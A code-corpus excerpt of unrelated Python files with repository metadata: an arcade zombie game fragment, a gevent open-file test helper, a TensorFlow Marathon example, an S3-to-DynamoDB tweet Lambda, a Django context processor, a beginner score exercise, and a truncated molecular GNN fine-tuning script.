self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | en | 0.891822 | This class holds all the information about the
different rooms. # You may want many lists. Lists for coins, monsters, etc. # This holds the background images. If you don't want changing # background images, you can delete this part. Create and return room 1.
If your program gets large, you may want to separate this into different
files. Set up the game and initialize the variables. # Sprite lists # Loop for each box going across # Create left and right column of boxes # Loop for each box going across # Skip making a block 4 and 5 blocks up on the right side # Loop for each box going across # If you want coins or monsters in a level, then add that code here. # Load the background image for this level. Create and return room 2. Set up the game and initialize the variables. # Sprite lists # -- Set up the walls # Create bottom and top row of boxes # This y loops a list of two, the coordinate 0, and just under the top of window # Loop for each box going across # Create left and right column of boxes # Loop for each box going across # Skip making a block 4 and 5 blocks up Main application class. Initializer # Set the working directory (where we expect to find files) to the same # directory this .py file is in. You can leave this out of your own # code, but it is needed to easily run the examples using "python -m" # as mentioned at the top of this program. # Sprite lists # Set up the player Set up the game and initialize the variables. # Set up the player # Our list of rooms # Create the rooms. Extend the pattern for each room. # Our starting room number # Create a physics engine for this room Render the screen. # This command has to happen before we start drawing # Draw the background texture # Draw all the walls in this room # If you have coins or monsters, then copy and modify the line # above for each list. Called whenever a key is pressed. Called when the user releases a key. Movement and game logic # Call update on all sprites (The sprites don't do much in this # example though.) # Do some logic here to figure out what room we are in, and if we need to go # to a different room. Main method | 3.671239 | 4 |
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | 10 | 8038 | # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
| # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
| en | 0.858515 | # Copyright (c) 2018 gevent community # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # Linux/OS X/BSD platforms can implement this by calling out to lsof # XXX: This prints to the console an annoying message: 'lsof is not recognized' # Skip header and blank lines # Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u" # Linux only # psutil import subprocess which on Python 3 imports selectors. # This can expose issues with monkey-patching. # If psutil is available (it is cross-platform) use that. # It is *much* faster than shelling out to lsof each time # (Running 14 tests takes 3.964s with lsof and 0.046 with psutil) # However, it still doesn't completely solve the issue on Windows: fds are reported # as -1 there, so we can't fully check those. Return a list of popenfile and pconn objects. Note that other than `fd`, they have different attributes. .. important:: If you want to find open sockets, on Windows and linux, it is important that the socket at least be listening (socket.listen(1)). Unlike the lsof implementation, this will only return sockets in a state like that. # num_fds is unix only. Is num_handles close enough on Windows? | 2.048503 | 2 |
examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | 5 | 8039 | <gh_stars>1-10
'''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='an integer for the accumulator')
parser.add_argument('--cpu', default=100.0, help='an integer for the accumulator')
parser.add_argument('--mem', default=100.0, help='an integer for the accumulator')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res
| '''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='an integer for the accumulator')
parser.add_argument('--cpu', default=100.0, help='an integer for the accumulator')
parser.add_argument('--mem', default=100.0, help='an integer for the accumulator')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res | en | 0.490669 | marathon_example.py performs a simple matrix multiply using 3 compute nodes | 2.453282 | 2 |
FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | 0 | 8040 | <reponame>Awannaphasch2016/CDKFAUCovid19Cralwer
'''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
dynamodb.put_item(
Item=tweet
)
| '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
dynamodb.put_item(
Item=tweet
) | en | 0.760083 | Original code contributor: mentzera Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/ # from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \ # twitter_to_es # dynamoDb_client = boto3.client('dynamodb') # Lambda execution starts here # Get the bucket name and key for the new file # Get s3 object, read, and split the file into lines # Parse s3 object content (JSON) # https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3 # clean trailing comma # print(tweets_str) # print(tweet['sentiments']) #===================== #==send data to dynamoDB #===================== # Get the service resource. # Instantiate a table resource object without actually # creating a DynamoDB table. Note that the attributes of this table # are lazy-loaded: a request is not made nor are the attribute # values populated until the attributes # on the table resource are accessed or its load() method is called. # Print out some data about the table. # This will cause a request to be made to DynamoDB and its attribute # values will be set based on the response. | 2.645139 | 3 |
user_messages/context_processors.py | everaccountable/django-user-messages | 21 | 8041 | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| en | 0.943273 | Return a lazy 'messages' context variable as well as 'DEFAULT_MESSAGE_LEVELS'. | 2.075097 | 2 |
Day_5/highest_score.py | ecanro/100DaysOfCode_Python | 0 | 8042 | <filename>Day_5/highest_score.py
## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | <filename>Day_5/highest_score.py
## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | en | 0.651194 | ## Highest Score # 🚨 Don't change the code below 👇 # 🚨 Don't change the code above 👆 # Write your code below this row 👇 # functional code | 3.903788 | 4 |
finetune/finetune.py | zaixizhang/MGSSL | 43 | 8043 | <gh_stars>10-100
import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
